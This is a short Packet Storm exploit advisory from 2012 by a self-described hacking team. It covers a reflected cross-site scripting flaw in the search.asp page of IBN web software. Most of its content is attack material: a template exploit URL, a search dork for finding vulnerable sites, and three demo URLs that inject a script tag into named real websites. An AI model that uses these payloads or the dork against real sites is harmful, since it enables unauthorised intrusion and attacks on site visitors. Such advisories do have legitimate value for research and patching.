IBN Cross Site Scripting

2012-08-27T00:00:00
ID PACKETSTORM:115932
Type packetstorm
Reporter Net.W0lf
Modified 2012-08-27T00:00:00

Description

                                        
                                            `################################################################  
----------------------------------------------------------------  
ibn (Search.asp) Cross Site Scripting Vulnerabilities  
----------------------------------------------------------------  
################################################################  
# Exploit Title : Ibn (search.asp) Cross Site Scripting Vulnerabilities  
# Author : Hack center Security Team  
# Discovered By : Net.W0lf  
# Software Link : http://www.ibn.ir/  
# Security Risk : High  
# Version : All Version  
# Tested on : Win7 - Back Track  
# Dork : "?????? ?????"  
################################################################  
----------------------------------------------------------------  
+-----------------------+  
| Cross Site Scripting |  
+-----------------------+  
  
Expl0!T :  
  
[Target]/search.asp?m=notexists&text=[Xss]  
  
Dem0:  
www.ofoqco.com/search.asp?m=notexists&text="><script>alert(/hack center/)</script>  
www.qoqnoos.ir/search.asp?m=notexists&text="><script>alert(/hack center/)</script>  
www.osveh.ir/search.asp?m=notexists&text="><script>alert(/hack center/)</script>  
  
##############################################################################  
Spical Tnx : Iranian Black Hat HackerZ  
##############################################################################  
`